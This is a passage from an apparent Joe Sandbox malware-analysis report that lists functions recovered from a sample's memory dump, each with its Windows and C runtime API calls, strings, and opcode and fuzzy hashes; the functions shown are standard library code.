Instruction Fuzzy Hash: 79F04972A00305DFE711EFA8E441B9E7BF0EB48725F10402AE590EB290DBBA59409F81

Function 010103D7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36

EnumSystemLocalesW.KERNEL32(01010330,00000001,00000000,?,?,01010B9B,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0101040E

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 8b15a387b85a753cad001fda644af2f661b70085022ddc3b50d41cc7af926033
Instruction ID: db6f250c87f5ebce469b016233817d6de59cdcbe37b2f65de9e73fc1bcc3bb54
Opcode Fuzzy Hash: 8b15a387b85a753cad001fda644af2f661b70085022ddc3b50d41cc7af926033
Instruction Fuzzy Hash: 3FF05C3570020557CB159F39C84566B7F94EFC1720F06405CFA858F148C63994C2C790

Function 01007A3B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,01005E4F,?,20001004,00000000,00000002,?,?,01005451), ref: 01007A6F

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 268a3ec643abea0c6cfa26908b2732f3de235d12ae89636e99fcb711e0c18fda
Instruction ID: 0bef02cd07060ffbf7bb3e265053f382734e37f921a6d65cb85f14a8d41fc491
Opcode Fuzzy Hash: 268a3ec643abea0c6cfa26908b2732f3de235d12ae89636e99fcb711e0c18fda
Instruction Fuzzy Hash: 25E0DF31400218BBEF232F74DC08EEE3F16EF48720F004010FDC122290CB3A9A619B90

Function 00FFA686 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000A692,00FF9B1B), ref: 00FFA68B

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9ce3fd1a37e3592abecfdb23111c9f0e4314e03b550948f74a36bcac9cd9c676
Instruction ID: eebdb84db02a0f110c9b9bba28caf8e8dab00260a466b8c87b2abe5095c783ea
Opcode Fuzzy Hash: 9ce3fd1a37e3592abecfdb23111c9f0e4314e03b550948f74a36bcac9cd9c676
Instruction Fuzzy Hash:

Function 01010CFB Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 01010CFB

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1ddb9cee070682249e151bb6cd742400f60ba64194ff43b9a636b5c21b2903c6
Instruction ID: ef6d3b1b60b1504254ce372fd86535b7cacf98b76afa9459f5e2e9871d64c5f3
Opcode Fuzzy Hash: 1ddb9cee070682249e151bb6cd742400f60ba64194ff43b9a636b5c21b2903c6
Instruction Fuzzy Hash: 2DA00470545301CF57504F75554570F37D557C57D570540557445D5154D77DC450FF01

Function 0100FBE5 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: 0f9c24c657bd0db36c4f52cf0b5d76922164c765e9f4968f4a7a3e24b7d707fe
Instruction ID: 8d66e6a441b39d6039ff6dd2f27a221b7b9221d6db4290d9bc6dfece7e1e4f55
Opcode Fuzzy Hash: 0f9c24c657bd0db36c4f52cf0b5d76922164c765e9f4968f4a7a3e24b7d707fe
Instruction Fuzzy Hash: 22B126355007479BEB3AAB68CC81BB7B3E9EF44708F14456DEAC2C61C1EA74B982D710

Function 00FF99C9 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FF99CF
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00FF99DD
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00FF99EE
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00FF99FF

Strings

GetCurrentPackageId, xrefs: 00FF99D7
GetTempPath2W, xrefs: 00FF99F4
GetSystemTimePreciseAsFileTime, xrefs: 00FF99E3
kernel32.dll, xrefs: 00FF99CA

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 7e5e4b61806bd80fe30acf3f77fd5b78ca43523249f0ae0a717e655ece5c0550
Instruction ID: 3b1bab7c98a67544e8bff1b5af8949462abc298f646a6cd546ddf2d2f28a8f2a
Opcode Fuzzy Hash: 7e5e4b61806bd80fe30acf3f77fd5b78ca43523249f0ae0a717e655ece5c0550
Instruction Fuzzy Hash: A1E0EC79641320EB8B315FB2BC0D8873AA4EB0D615341DC6BF5C1D610DD67E85018B69

Function 00FFD388 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00FFD4A7
___TypeMatch.LIBVCRUNTIME ref: 00FFD5B5
_UnwindNestedFrames.LIBCMT ref: 00FFD707
CallUnexpected.LIBVCRUNTIME ref: 00FFD722

Strings

csm, xrefs: 00FFD4DE
csm, xrefs: 00FFD3C5
csm, xrefs: 00FFD432

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 74fb29ce00354871b7cd432f53e3bd53ded5c5735159feb4445de1b3eea5b62c
Instruction ID: fc80276bb281760ddad6e1b8407379e5dce24ceca87f0711b16e737ac066dc93
Opcode Fuzzy Hash: 74fb29ce00354871b7cd432f53e3bd53ded5c5735159feb4445de1b3eea5b62c
Instruction Fuzzy Hash: 64B16871C0020DEFCF15EFA4C9819BEB7B6AF04320F14405AEA15AB226D735EA51EF91

Function 0100BDEB Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 0100C064

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 00f0e95c3ea00d88d331da633d36f4cae0fd9f36bb684cde355c865a609f4e12
Instruction ID: 62c5a39f83093aaf7e2c84baf1f628b8e8fc3e6e2f5390058fcba3643592e4c5
Opcode Fuzzy Hash: 00f0e95c3ea00d88d331da633d36f4cae0fd9f36bb684cde355c865a609f4e12
Instruction Fuzzy Hash: 8AB1C174A0424AAFFB17DF9CC980BAEBBF1AF46304F0442D9E680972D1C7759981CB61

Function 010147AA Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0157FE40,0157FE40,?,7FFFFFFF,?,01014A7A,0157FE40,0157FE40,?,0157FE40,?,?,?,?,0157FE40,?), ref: 01014850
__alloca_probe_16.LIBCMT ref: 0101490B
__alloca_probe_16.LIBCMT ref: 0101499A
__freea.LIBCMT ref: 010149E5
__freea.LIBCMT ref: 010149EB
__freea.LIBCMT ref: 01014A21
__freea.LIBCMT ref: 01014A27
__freea.LIBCMT ref: 01014A37

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 3a69a0e83862152f1d98c225163e62e4568ec121b408afefd1b0c7629bc0b609
Instruction ID: ef873e4cc8ed04d1f2d76d0109add811ab11f6d686b9b33eaa9ca4c554bed087
Opcode Fuzzy Hash: 3a69a0e83862152f1d98c225163e62e4568ec121b408afefd1b0c7629bc0b609
Instruction Fuzzy Hash: 7B71263290424A5BEF219F988C41BFE7BEAAF45310F190199EEC4E72A5E77D8800C764

Function 00FF9662 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00FF96AB
__alloca_probe_16.LIBCMT ref: 00FF96D7
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00FF9716
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FF9733
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00FF9772
__alloca_probe_16.LIBCMT ref: 00FF978F
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FF97D1
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00FF97F4

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 21df004707abe7174977bebe605bd8609b2b13df691abc1396ed086a0c222acf
Instruction ID: 40e7653c6a08d9055728aef8311064023d0869ed07e7ba9284d7ad0a017d8072
Opcode Fuzzy Hash: 21df004707abe7174977bebe605bd8609b2b13df691abc1396ed086a0c222acf
Instruction Fuzzy Hash: 7451D27291420EABEF215F50CC44FBB7BA9EF40790F104425FA05D61A0D7B99C10EB50

Function 00FF84D1 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00FF84D8
std::_Lockit::_Lockit.LIBCPMT ref: 00FF84E2
int.LIBCPMT ref: 00FF84F9

Part of subcall function 00FF2D36: std::_Lockit::_Lockit.LIBCPMT ref: 00FF2D47
Part of subcall function 00FF2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 00FF2D61

codecvt.LIBCPMT ref: 00FF851C
std::_Facet_Register.LIBCPMT ref: 00FF8533
std::_Lockit::~_Lockit.LIBCPMT ref: 00FF8553

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 2c22e613be808d18341e11bffbe16943a77127d75a4cbfadc4b10f264e9d42d0
Instruction ID: 285982a1602c693d5360f41493f238c6583d0dcc8b32b531f20646f88ee48ac6
Opcode Fuzzy Hash: 2c22e613be808d18341e11bffbe16943a77127d75a4cbfadc4b10f264e9d42d0
Instruction Fuzzy Hash: 8011B47190061C9BCB14EB68CC017BE77B4BF44734F180909FA45AB2A1EFB8AE01E791

Function 00FFD01A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00FFD011,00FFB5E0,00FF5F94,9B609FF6,?,?,?,?,010163F6,000000FF), ref: 00FFD028
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FFD036
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FFD04F
SetLastError.KERNEL32(00000000,?,00FFD011,00FFB5E0,00FF5F94,9B609FF6,?,?,?,?,010163F6,000000FF), ref: 00FFD0A1

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 37d662224dc85c8cbc4d92dcc9dc066841be498835d58c018e11b94d002ba652
Instruction ID: 12998db98dc64b744d0ef2ed560aa387a72d557de0a8f8602bd1e50a8489c696
Opcode Fuzzy Hash: 37d662224dc85c8cbc4d92dcc9dc066841be498835d58c018e11b94d002ba652
Instruction Fuzzy Hash: D601B53250931E5DA7392574AC45A3B3E45EF01779F20032AF750811F8EF5A4C03B648

Function 00FF71DC Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00FF71E3
std::_Lockit::_Lockit.LIBCPMT ref: 00FF71ED
int.LIBCPMT ref: 00FF7204

Part of subcall function 00FF2D36: std::_Lockit::_Lockit.LIBCPMT ref: 00FF2D47
Part of subcall function 00FF2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 00FF2D61

codecvt.LIBCPMT ref: 00FF7227
std::_Facet_Register.LIBCPMT ref: 00FF723E
std::_Lockit::~_Lockit.LIBCPMT ref: 00FF725E

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 4aee68ceb4b6c09fc957b18fc77d3256d34f2c36882919b93ffcaf49ee013ee4
Instruction ID: a1038bc6e4953978d66134f000423c9cdb600684755d212a03b20629d77a496c
Opcode Fuzzy Hash: 4aee68ceb4b6c09fc957b18fc77d3256d34f2c36882919b93ffcaf49ee013ee4
Instruction Fuzzy Hash: FB01C03190422D8BCB14FBA4DC556BEB7A1BF84720F240408FA00AB2E1DF789E01EB91

Function 010049CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9B609FF6,00000000,?,00000000,0101661D,000000FF,?,0100495C,?,?,01004930,?), ref: 01004A01
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01004A13
FreeLibrary.KERNEL32(00000000,?,00000000,0101661D,000000FF,?,0100495C,?,?,01004930,?), ref: 01004A35

Strings

mscoree.dll, xrefs: 010049FA
CorExitProcess, xrefs: 01004A0B

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6bc159a0eea634607154b77828ddd2caef2f365e599cb9710f7fcb2d7d5d8dea
Instruction ID: 2ff9617a381a88fa24d5a5d0af963a0962ced921fda71c4625224e9567d06511
Opcode Fuzzy Hash: 6bc159a0eea634607154b77828ddd2caef2f365e599cb9710f7fcb2d7d5d8dea
Instruction Fuzzy Hash: 3701A735600655EFEB229F94CC05BAFBFB9FB04711F004529F951E2284DB7D9500CB54

Function 01009DF2 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 01009E79
__alloca_probe_16.LIBCMT ref: 01009F3A
__freea.LIBCMT ref: 01009FA1

Part of subcall function 01007F6F: HeapAlloc.KERNEL32(00000000,00FF55FC,?,?,00FFAFBA,?,?,?,00000000,?,00FF2709,00FF55FC,?,?,?,?), ref: 01007FA1

__freea.LIBCMT ref: 01009FB6
__freea.LIBCMT ref: 01009FC6

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: eda7b0f1dde1100209fdc5cfc4ccfe445499b1afb678c966c80144bbc90455fa
Instruction ID: 35afd2f145bf9628a286a3b262dfe24c9de350d217320563250c936c1e78e8f9
Opcode Fuzzy Hash: eda7b0f1dde1100209fdc5cfc4ccfe445499b1afb678c966c80144bbc90455fa
Instruction Fuzzy Hash: F851A37260420A6BFB225F68CC40EBB7AE9EF44358F15416CFE4CD6291EB75DC108760

Function 00FF617D Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FF6191
AcquireSRWLockExclusive.KERNEL32(?,?,00FF4EBB,?,?,00FF3E10), ref: 00FF61B0
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00FF4EBB,?,?,00FF3E10), ref: 00FF61DE
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00FF4EBB,?,?,00FF3E10), ref: 00FF6239
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00FF4EBB,?,?,00FF3E10), ref: 00FF6250

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: f7116fb2be88e7f7cb69800b94db048652ad79757dafab4cef407511fec6c08b
Instruction ID: 0a4abf8f5b22de5b11fdd4c03605ff03903c5cd46c17765e99204b36087ed057
Opcode Fuzzy Hash: f7116fb2be88e7f7cb69800b94db048652ad79757dafab4cef407511fec6c08b
Instruction Fuzzy Hash: 6C41563190060ADFCF20CF64C481ABAB7B4FF49364B104A2AE646D7561DB34F984EB90

Function 00FF66C5 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00FF66CC
std::_Lockit::_Lockit.LIBCPMT ref: 00FF66D7
std::_Lockit::~_Lockit.LIBCPMT ref: 00FF6745

Part of subcall function 00FF6828: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00FF6840

std::locale::_Setgloballocale.LIBCPMT ref: 00FF66F2
_Yarn.LIBCPMT ref: 00FF6708

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 9e0aa047749780028b62ec3f4c31f4836bc5b28e49d191b2a8dc19e2150103cb
Instruction ID: 033c60f905fb654ac87ffe461b790978b37012dc25f79a36ea734237c4e81e56
